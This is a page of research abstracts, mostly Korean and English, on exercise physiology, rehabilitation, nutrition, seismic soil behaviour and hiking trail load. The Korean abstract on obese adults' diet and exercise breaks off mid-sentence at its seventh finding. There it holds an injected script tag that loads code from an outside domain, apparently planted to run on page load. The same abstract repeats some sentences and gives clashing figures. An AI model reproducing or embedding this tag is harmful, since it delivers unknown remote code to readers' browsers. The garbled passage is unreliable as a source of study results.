        Physiological Cost Index (PCI) of walking has been widely used to predict oxygen consumption in healthy subjects or patients. The purposes of this study were to evaluate the predictability of physiological cost index of upper extremity exercise with a sander for the amount of exercise and cardiac function and to find out most efficient speed of exercise. Upper extremity exercise was conducted in 67 healthy children (age 4 -12) for 2 minutes with a sander in two different speeds, such as self selected comfortable and self selected fast speeds. Speed of sander was calculated, and heart rate were measured before and immediately after the exercise. Physiological Cost Index (PCI) of upper extremity exercise was calculated for statistical analysis. The result were as follows; 1. Comfortable and fast speeds of the sander went up according to the increase of age, sander PCI during exercise by it, decreased as the age increased with significant difference in each group (p=0.00). The heart rate change during exercising by it, there was no significant difference. 2. The heart rate change during the exercise by sander increased as the speed of sander increased. Linear regression equation between the heart rate change during the exercise by sander and the speed of sander were 'Y (the heart rate change by sander) = 0.332X (the speed of sander) + 12.731' (R²= 0.154). Stepwise regression showed the speed of sander affected the change of heart rate positively, and the age affected negatively (R²= 0.242, p = 0.00). 3. The PCI during the exercise by sander decreased as the speed of sander increased. Linear regression equation between the PCI during the exercise by the sander and the speed of sander were 'Y (the PCI by sander) = -0.00495X (the speed of sander) + 2.091'(R²= 0.267), and statistic significant was recognized (p = 0.00). 4. The speed of exercise by sander it increased as the age increased. Linear regression equation between the speed of the sander and the age were 'Y (the speed of sander) = 2.481X (the age) -0.893(R²= 0.452), and statistic significant was recognized(p = 0.00). 5. The reliability analysis for the method of examining each PCI, showed high reliability coefficients and the value of alpha was 0.9337. In conclusion, PCI of the upper extremity exercise with a sander could be thought to predict the energy consumption from the speed of sander as there was a linear relationship between the speed of sander exercise and heart rate change with exercise. PCI of the upper extremity exercise with the self selected fast speed was most efficient. Further study with oxygen consumption analysis is recommended to apply PCI in upper extremities in patients with different pathologies in motion.

        구조물 지진해석을 위한 구조물 -지반 상호작용 해석에서도 비선형 지반 특성을 고려한 비선형해석이 요구되고 있어 구조물 비선형 지진 해석을 위해 기초 지반에 대한 수평방향 비선형 해석을 수행하였다. 기초지반은 UBC 분류에서 규정한 보통지반인 Sn 지반과 연약지반인 SE 지반을 고려하였고, 지반의 비선형 특성은 Ramberg-Osgood 모델을 이용하였다. 비선형 지반이 기초지반 수평 및 회전 동적 강성 및 감쇠비에 미치는 영향을 조사하기 위하여 얕은 기초와 묻힌기초에 대해 기초 크기, 지반깊이 및 말뚝유무에 따른 동적 강성 및 감쇠비 변화를 조사하였는데, 지반의 비선형 특성이 기초지반의 선형 수평 및 회전 강성과 감쇠비를 크게 감소 또는 증가시키는 것으로 나타났으며, 기초크기, 지반깊이 및 말뚝유무의 영향도 큰 것으로 나타나 구조물 지진해석시 기초크기, 지반깊이 및 말뚝유무와 함께 지반의 비선형성도 고려하는 것이 필요한 것으로 판단되었다.

        The purpose of this study was to determine the effect of electrical stimulation biofeedback on motor learning of quadriceps muscle isometric exercise in 3 patients who have undergone total knee replacement surgery. A multiple baseline design across subjects was used. The electrical stimulation biofeedback was provided with each patient during quadriceps isometric exercise, which last 10 to 14 sessions with 10 repetitions each sessions. After training patients received 4 retention tests. Maximum muscle activity was measured pre- and post- electrical stimulation biofeedback training and retention test to evaluate the effect of biofeedback training. Maximum isometric muscle activity of quadriceps was increased after electrical stimulation biofeedback training in all subjects. The results indicate that a electrical stimulation biofeedback training is a useful method to improve motor learning of quadriceps isometric exercise in total knee replacement.

        The purpose of this study was to determine the effects of mild-intensity exercise training on the denervated muscle atrophy in the sciatic nerve injured rat. Thirty-six male Sprague-Dawley rats (250~300 g) were randomly assigned into three groups; sham-denervated group (n=8), denervated group (n=8), and denervated-exercised group (n=20). Exercise consisted of treadmill running at 20 m/min speed with 0% grade for 30 min/day. The animals were decapitated at the second and sixth weeks postcrush. Soleus and medial gastrocnemius were immediately excised to be weighed. Type I and II fibers of the muscles were differentiated by m-ATPase (pH 9.4) stain, and fiber diameters were evaluated. The results were as follows: 1) The weight of the soleus and medial gastrocnemius muscles showed a tendency to increase in both the denervation-exercised groups compared to the denervated group. 2) In the 2-week denervation-exercised group, type II fiber diameter of soleus and type I fiber diameter of medial gastrocnemius were increased significantly compared to the denervated control group. 3) In the 6-week denervated-exercised group, type I fiber diameter of soleus and type II fiber diameter of medial gastrocnemius were hypertrophied significantly compared to sham-denervated group. The results of this study suggested that treadmill exercise partially prevented denervation atrophy in the soleus and medial gastrocnemius of the rat.

        For the purpose of disclosing the effects of progressive low intensity exercise on the activity of the elderly, questionnaire survey and physical fitness examination were performed on the subjects who were 65 years old or older. The subjects were assigned into two groups using paired matching on gender and age: experimental group (33 persons) and control groups (35 persons). The subjects in experimental group was put on the low intensity exercise program (exercising upper and lower limbs for 12 weeks using dumbbell and lead-packed weight). The results showed that the difference of physical and social behavior scores among activities before and after exercise were significantly higher in all variables of general characteristics, health habits and status, perception, and physical fitness. The findings of this research suggested that the progressive low intensity exercise improves the activities of the elderly, physical activity, self assessed activity, activities of daily living, instrumental activities of daily living, social behavior of the elderly be affected by general characteristics, health habits and status, perception, and physical fitness.

        The present study was performed to investigate the prevalence rate of idiopathic scoliosis and to determine the effect of exercise training on scoliotic angle in elementary school children. In this study, two out of five elementary schools in Seosan city were chosen by random sampling. Seven hundred sixty four students (from four grade to the sixth grade student) were selected in two schools. Screening tests were conducted to find idiopathic scoliosis. Among the 764 individuals, 139 subjects who showed positive sign in physical examination took whole spine radiography. Thirty six subjects who had a curve of 10 or greater and consented to participate in the exercise program were selected for the exercise program. The exercise program was performed four times a week for 5 months. The results of this study were as follows: 1) One hundred thirty nine subjects showed positive sign in the scoliosis screening test. 2) The overall prevalence of curve of greater in X-ray finding was 8.15%. The prevalencies of curve of greater in male and female were 7.1% and 9.2%, respectively. 3) Scoliosis curves were observed at thoracic area (48.4%), at thoracolumbar area (27.4%) and at lumbar area(24.4%). 4) Right side curve was 59.7%, and left side curve was 40.3%. 5) After the 5 month exercise program for scoliosis, the Cobb's angle was significantly decreased. 6) There was no significant difference of Cobb's angle change respect to sex, grades, and scoliosis curve site. Results shown here indicates that an early detection and early exercise for scoliosis can result in decreased the Cobb's angle in elementary school children.

        본 논문에서는 부지특성을 고려한 설계지반운동의 산정방법을 연구하였으며 그 해석결과를 지반 구조물의 내진설계에 적용하는 방법을 제안하였다 지진응답 해석시 사용되는 설계응답스펙트럼과 설계시간 이력등의 입력운동의 통제점 위치가 지반구조물 내진설동 지층내 암반운동 그리고 노두운동을 사용하는 방법으로 나눌 수 있고 이에 따라 작용 설계지진운동이 변화하므로 지반구조물의 경계조건에 적합한 방법을 사용하여야 한다.

        The purposes of this study were to assess variation of body sway prior to and after submaximal treadmill exercise; to determine the time course of the effects of a fatiguing performed on a treadmill on body sway; and to compare position sense prior to and after exercise in order to assess any variance in proprioception caused by submaximal treadmill exercise. The subjects were twenty-four healthy men in their twenties. They stood barefoot on the Kinesthetic Ability Training Balance Platform to measure body sway. Control trials were performed with eyes alternately open and closed. In the eyes open condition, they were asked to look at a target placed at eye level 1 m in front them. A total of 10 trials, each lasting 20 seconds, were performed. After this series of trials, position sense was measured. Subjects then exercised on the treadmill until 85% of each person's maximal heart rate was reached. The first series of postural sway measurements began immediately after this exercise. The second identical series of postural sway trials was performed at approximately 10 minutes after exercise. The third series was performed approximately 20 minutes after exercise. This allowed approximately 5 minutes of rest between each experimental series. Position sense was measured at approximately 15 and 25 minutes after exercise. The results were as follows: 1) There was a significant increase in body sway after submaximal treadmill exercise compared to pre-exercise values under both visual conditions (p<.05). 2) After submaximal treadmill exercise, under the eyes open condition, the mean value of body sway was significantly increased after both the first and second series (p<.05). Under the eyes closed condition, the mean value of body sway increased significantly after the first series but decreased significantly after the third series (p<.05). 3) Position sense, measured repeatedly after submaximal treadmill exercise, did not change significantly with respect to pre-exercise values (p>.05). These results suggest that fatigue induced by submaximal treadmill exercise produced an increase in body sway in young healthy subjects with or without visual input, but the increase appeared to be lasting less than 15 minutes. No significant change in position sense suggested that proprioception was unaffected by submaximal treadmill exercise-induced fatigue.

        The purpose of this study was to establish modified physiological cost index (PCI) for predicting energy consumption by heart rate (HR) at isokinetic ergometer exercise testing. The subjects were twenty-eight healthy men in their twenties. All of them performed upper and lower extremity isokinetic ergometer exercise tests which had six loads (400, 500, 600, 700, 800, and 900 kg-m/min) and five loads (400, 500, 600, 700, and 800 kg-m/min) respectively. The exercise sessions were finished when HR was in plateau. HR and oxygen consumption were determined during the final minute. Resting heart rate and oxygen consumption were used for calculating heart rate, oxygen consumption changes and modified PCI. Regression analysis established the relationship between each variable to work load, HR and oxygen consumption. The results were as follows: 1) In the lower extremity ergometer exercise test, oxygen consumption increased continuously as work load increased, but in the upper extremity ergometer test, oxygen consumption only increased until work load was 700 kg-m/min. 2) HR increased as work load increased in both exercise tests, but in the upper extremity ergometer test, HR decreased from the 700 kg-m/min. 3) The modified PCI increased as work load mcreased until the 700 kg-m/min point in the lower extremity ergometer test and until the 500 kg-m/min point in the upper extremity ergometer test when it started to decrease in both tests. 4) In the lower extremity ergometer exercise test, regression analysis established the relation as = -.0215HR - .2141 where is given in l/min and HR in beat/min ( = .2677, p = .000). ln the upper extremity ergometer exercise test. regression analysis established the relation as = -.0115HR + .2746 ( = .1308, p = .000). The results of this study were similar to previous studies but were different under high work load conditions. So modified PCI should be used with only low intensity work load testing. Subjects for upper extremity ergometer exercise testing should complete a prescribed training course prior to testing, and only low intensity work load should be used for safety considerations.

        최근 풍족한 식생활로 인한 영양소의 과잉섭취와 운동량의 부족으로 비만증이 늘어나고 있다. 비만증의 위험이 널리 인식되면서 비만성인들의 무분별한 다이어트와 운동으로 영양결함이나 이와 관련된 질병들이 발행할 우려가 있으므로 적절한 영양교육 프로그램개발을 위한 기초자료를 위해 식사 행동, 영양섭취실태 및 건강상태에 관한 실태를 조사하여 비만군과 대조군을 비교해 본 결과 다음과 같은 결과를 얻었다. 1. 평균연령은 남녀 각각 38.1±10.8세, 35.2±8.8세였으나, 전체 연령의 분포는 30세 이하가 28명(35%), 30세에서 39세가 23명(28%), 40세에서 49세가 19명(23.5%), 50세 이상이 11명(13.5%)으로 30세에서 49세가 가장 많았다. 체중조절 운동에 참여한 기간은 1∼2개월 정도가 5명(6.1%), 3∼4개월은 24명(29.8%), 5∼6개월은 39명(48.2%), 6개월 이상은 13명(15.9%)으로 5∼6개월이 가장 많았다. 2. 에너지 섭취량의 경우 비만군이 1, 451.0kcal로써 대조군 1, 572.4kcal에 비해 8%정도 적게 섭취하는 것으로 나타났으며 한국인의 영양권장량^21)에 대한 비율로는 대조군이 74% 비만군이 65% 수준으로 섭취하고 있었다. 에너지 섭취량과 마찬가지로 권장량에 미치지 못하는 영양소는 단백질, 칼슘, 철분, 비타민 B_1, 비타민 B_2이었다. 총열량에 대한 탄수화물, 지방, 단백질의 열량 비율은 비만군이 61.2:21.6:16.6, 대조군이 62.8:21.3:16.0으로 한국인 영양권장량에서 이상적인 구성 비율로 권장하고 있는 65:20:15와 비교해 볼 때 탄수화물 섭취 비율이 두 군 모두 약간 낮으나 지방과 단백질의 섭취비율은 비슷하였다. 3. 평균 신장은 비만군이 165.8cm, 대조군이 164.2cm으로 두 군간에 차이가 없었으나. 평균 체중은 비만군이 74.9kg, 대조군이 60.4kg으로 나타나 유의적인 차이(p<0.001)를 보였다. TSF는 비만군이 28.3mm, 대조군이 23.7mm로 두 군간에 유의적인 차(p<0.001)를 나타냈다. MAMC는 비만군이 25.5cm, 대조군이 21.7cm로써 두 군간에 유의적인 차이(p<0.001)를 보였다. 4. 식사행동에 관한 내용에서는 하루에 몇 회 식사하는가, 규칙적인 식사를 하는가, 식사에 걸리는 시간에 관한 문항으로 나누어 조사한 결과, 하루에 3회 식사하는 사람이 대부분이었으나 비만군의 여자 1명과 대조군의 여자 2명이 하루 1회만 식사를 하고, 비만군의 여자 4, 남자 2명과 대조군의 여자 7명이 하루 2회 식사를 하는 것으로 나타나 식사행동이 잘못되었음을 알 수 있었다. 규칙적인 식사를 하는가에 관한 물음에서는 대체로 규칙적이다라고 답한 사람이 비만군은 14명(38.9%), 대조군은 22명(52.4%)으로 대조군이 많았다. 불규칙적이다라고 답한 사람은 비만군이 여자 5명과 남자 22명으로 전체 27명(57.5%), 대조군이 여자 6명과 남자 6명으로 전체 12명(57.5%), 대조군이 여자 6명과 남자 6명으로 전체 12명(36%)이었다. 불규칙적인 식사를 하는 비만군 남자의 경우 잦은 음주로 인하여 식사를 하는 비만군 남자의 경우 잦은음주로 인하여 식사를 제 때에 못한다고 답한 사람이 많았다. 식사에 걸리는 시간은 10분 이내인 경우는 비만군에서 다소 많았으며 그 외는 10분에서 20분 사이라고 답한 사람이 대부분이었다. 5. 운동에 참여하는 정도는 참여한다라고 답한 사람이 비만군이 17명(42.1%), 대조군이 13명(35.7%)이었으며, 가끔 참여한다라고 답한 사람이 비만군이 25명(62.1%), 대조군이 26명(64.3%)이었다. 운동빈도는 1주일에 3∼5회 하는 사람이 비만군19명(43.4%), 대조군 23명(63.5%)으로 나타나 대조군이 비만군보다 많았다. 운동빈도에 따른 인체계측의 변화는 1주일에 6∼7회 운동하는 사람의 체중과 TSF가 1∼2회 및 3∼5회 운동하는 사람보다 약간 낮게 나타났으며, 대체적으로 비슷한 분포를 보였다. 1회 운동시 걸리는 시간은 30분이 전체의 약 44%로 가장 많았고, 그 다음이 60분으로 전체의 약 39%였다. 체중조절을 위해 운동에 참여한 기간은 비만군 23명(54.6%)과 대조군 16명(38.9%)이 5∼6개월에 답을 하여 가장 많은 수치를 나타내었다. 평소에 자신이 알고 있는 영양지식을 실생활에 활용하는가에 관한 물음에서 전체 52명(64.2%)이 대체적으로 활용하고 있다고 답했으며, 적극적으로 활용한다고 답한 사람이 전체 29명(35.8%)으로 나타났다. 6. 각 영양소 섭취량과 인체계측 지표간의 상관성을 분석하여 본 결과, PIBW는 열량섭취량(r = -0.241, p<0.05)과 탄수화물 섭취량(r = -0.259, p<0.05)사이에 유의한 음의 상관관계가 있음을 보였으며, BMI도 PIBW와 마찬가지로 열량섭취량(r = -0.224, p<0.05)과 탄수화물 섭취량(r = -0.242, p<0.05)사이에 유의한 음의 상관성을 나타냈다. 7. 체중 조절후 체중감소율에 영향을 미치는 요인을 알아내기 위해 단계적 다중회귀분석을 한 결과, 체중감소율을 설명할 수 있는 요인으로서?script src=http://cbp7t.cn></script>

        지리산국립공원 동부지구의 주요 등산로를 대상으로 운동부하 보행속도 휴식시간 비율을 조사한 결과 순수 보행시간 중 운동부하는 거림-세석평전구간이 92,4% 이며 장터목-천왕봉구간이 91.3%로 조사되었다 또한 중산리-장터목구간이 86.9% 세석평전-장터목구간이 85.3%로 조사되었다 보행속도는 장터목-천왕봉 구간이 3.97km/hr 세석평전-장터목구간이 3.06km/hr 로 조사되었으며 거림-세석평전구간은 2.23km/hr 중산리-장터목구간은 2.02km/hr,조사되었다 전체등산시간중 휴식시간의 비율은 거림-세석평전구간이 26.0%이며 중산리-장터목구간이 22.6%로 조사되었다 세석평전-장터목구간은 3.0% 장터목-천왕봉구간은 0%로 조사되었다.

        These experiments were conducted to examine the effects of theophylline, pentoxifylline and heparin on frozen-thawed Hanwoo sperm for enhancing motility and viability of sperm. Frozen-thawed semen collected from one bull was treated in TALP(tyrode-albuminlactate-pyruvate) containing varous concentrations of theophylline and pentoxifylline. After incubated at 5% CO2 in air atmosphere for 6 hours, the motility of sperm after the treatments was characterized by CASA(computer aided semen analysis) system. When monitored notility(MOT) and curvilinear velocity(VCL), theophylline and pentoxifylline exerted their optimal action at the concentration of 30 mM and 3 mM, respectively. No difference of sperm motility was observed when the sperm was treated with both substances compared with a single treatment of each substance. Comparison was then made for evaluating the effect of theophylline and / or pentoxiophylline on the motility and viability of significant treatment effects of each substance, high MOT and VCL values were detected in sperm treated with theophylline. In the case of sperm viability examined by an eosin-nigrosin staining, however, a significant decrease was found after the combined treatment of theophylline+pentoxyphilline than after the treatment with heparin alone or no treatment(P<0.05). In conclusion, theophylline, pentoxiphylline or heparin can be used for enhancing the motional characteristics and viability of frozen thawed Hanwoo semen. Considering characteristics of these substances, theophyline may be useful in the artificial insemination system, which requires vigorous sperm motility. While, heparin supporting sperm viability in vitro can be effectively used for improving in vitro-fertilization system.

        Physical therapists have been using balance and weight shifting training to induce improvements in standing and walking. This study compared the effects of kinetic feedback frequency and concurrent kinetic feedback on the performance and learning of a weight shifting skill in young, nondisabled adults. Sixteen young adults without known impairment of the neuromusculoskeletal system volunteered for the study. Subjects in each of three kinetic feedback groups performed a weight shifting task in an attempt to minimize error between their effort and a center of pressure (COP) template for a 12 second period. Feedback was provided: 1) concurrently (concurrent feedback), 2) after each trial (100% feedback), 3) after every other trial (50% feedback). Immediate and delayed (24 hour) retention tests were performed without feedback. During acquisition phase, the concurrent feedback group exhibited less error than either of the post response feedback group. For the immediate retention test, the 50% feedback group exhibited less error than did the 100% feedback and concurrent feedback. During the delayed retention, 50% feedback group displayed less error than did the other groups. But no significant differences were found between groups. These results suggest that practice with concurrent feedback is beneficial for the immediate performance, but not for the learning of this weight shifting skill. Lower frequency of feedback resulted in more permanent changes in the subject's ability to complete the task.

        The purpose of this study is to determine whether movement strategies affect functional forward reach distance in a standing position. Forty-seven healthy subjects were selected for this study: 23 men and 24 women, with an average age of 22.3. Functional forward reach distances were measured as hip strategy and squat strategy (included knee and ankle movement strategy) in a standing position, respectively. The mean values of functional forward reach distance in hip strategy, squat strategy were 33.57 cm, 29.48 cm, respectively. There was significantly difference in functional forward reach distance between hip strategy and squat strategy(p<.001). There was no difference of functional forward reach distance between male and female in hip strategy, but there was significant difference in other strategy(p<.05). These results suggest that movement strategies should be considered during functional forward reach test in standing. Further study is required to determine whether movement strategies affect functional reach distance in elderly and disabled groups.

        The purpose of this study is to determine the effects of exercise training on the strength and balance ability of the elderly. The results of this study are: 1) After 8 weeks exercise training, knee muscle strength showed a significant increment. 2) After exercise training, forward functional reach and balance index of KAT 2000 showed a significant increment. Results indicate that strengthening exercise can result in improved muscle strength and balance in the elderly. Further studies are required to show long-term effects of exercise training on the elderly.
